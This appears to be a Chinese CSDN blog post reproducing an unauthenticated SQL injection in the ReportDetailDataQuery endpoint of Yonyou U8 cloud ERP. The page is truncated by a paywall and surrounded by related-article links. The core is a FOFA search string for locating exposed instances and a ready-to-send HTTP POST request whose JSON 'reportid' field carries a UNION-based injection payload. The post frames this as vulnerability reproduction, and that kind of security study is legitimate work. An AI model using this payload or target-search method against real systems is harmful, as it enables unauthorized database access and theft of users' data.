用友U8 cloud ReportDetailDataQuery 接口处sql注入漏洞

最新推荐文章于 2024-07-22 21:29:22 发布
最新推荐文章于 2024-07-22 21:29:22 发布
阅读量64 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136447443
版权

文章目录

产品简介

U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。

漏洞描述

用友U8 cloud ReportDetailDataQuery 接口处存在sql注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。

fofa

app=“用友-U8-Cloud”

漏洞复现

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Content-Length: 354
Host: 
Content-Type: application/json
Connection: close

{"reportid":"' UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113)+(CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
订阅专栏
用友U8 Cloud ReportDetailDataQuery SQL注入漏洞复现(QVD-2023-47860)
0xSec
02-05 654
用友U8 cloud ReportDetailDataQuery接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
用友U8Cloud BlurTypeQuery 接口SQL注入漏洞
weixin_43567873的博客
03-04 42
用友U8Cloud BlurTypeQuery 接口存在SQL注入漏洞
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
qq_42067124的博客
12-28 640
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
0day!!! 用友U8 Cloud 多个接口SQL注入-新接口
weixin_43167326的博客
02-28 873
用友U8-OA协同管理软件定位于企事业组织行为管理的需求,融入现金的协同管理理念,为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营所涉及的协作管理、审批管理、公文管理、知识管理、文化建设、资源管理等关键内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、管理规范、公文流转、知识共享、文化建设、资源整合等难题,提升办公效率、实现资源共享、降低组织管理成本,全面提升企业核心竞争力。U8-OA能够帮助企业实现业务数据互通互联,减少用户数据重复录入、保持数据一致性和完整性;
用友U8 CLOUD 数据集成方案
05-11
用友U8 CLOUD 数据集成方案,外部数据交换平台主要用于外部系统和 U8 cloud 系统进行集成。利用外部数据交换平台, 可以将外系统的基本档案和业务数据发送到 U8 cloud 系统中,并进行相关的业务操作,如审 批、弃审...
用友U8 cloud V3.0发版说明产品功能介绍-整体版-2020年6月.PDF
06-23
用友U8Cloud V3.0版本发版说明及功能介绍。最新发版产品。2020年6月23日。集团版企业管理软件。
用友U8 cloud V1.0-自定义技术红皮书.pdf
02-16
用友U8 cloud V1.0-自定义技术红皮书
用友U8 cloud V1.0-公式技术红皮书.pdf
02-16
用友U8 cloud V1.0-公式技术红皮书
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 421
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
【网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
par@ish的博客
07-22 818
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
网站验证:确保网络安全与信任的重要步骤
07-22 191
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 284
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
【DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 1184
DVWA靶场漏洞复现之文件上传+文件包含。
2024年对网络安全专业的观点解析
goodxianping的专栏
07-17 645
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
网络安全相关竞赛比赛
黑战士的博客
07-18 665
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
如何保护你的网络安全
m0_70655343的博客
07-15 868
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
网络安全法规对企业做等保有哪些具体规定?
gmqqcsdn的博客
07-22 473
企业需根据信息系统被定级的保护等级,执行必要的安全保护措施,包括技术措施和其他必要措施,确保网络免受干扰、破坏或未经授权的访问,防止网络数据泄露或被窃取、篡改。根据《中华人民共和国网络安全法》,企业作为网络运营者,需要履行网络安全等级保护制度的相关义务,确保网络安全和数据保护。:企业应根据网络安全等级保护制度的要求,对其负责运行的信息系统进行安全保护等级的划分,并采取相应级别的安全保护措施。:企业在处理个人信息时,应遵循法律、行政法规的规定,建立个人信息保护影响评估等义务,确保个人信息的合法合规处理。
软件更新的双刃剑:从”微软蓝屏”事件看网络安全的挑战与对策
最新发布
Wikino的博客
07-22 726
本文深入分析了"微软蓝屏"事件的影响和启示,探讨了软件更新流程优化、风险管理加强和应急响应机制完善的重要性。文章还提出了政策法规与行业标准的完善建议,并展望了人工智能、区块链等新技术在提高系统安全性方面的应用前景。最后,文章强调了构建安全、稳定的数字世界需要政府、企业和个人的共同努力,并呼吁各方携手共建更加安全、可靠的数字未来。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值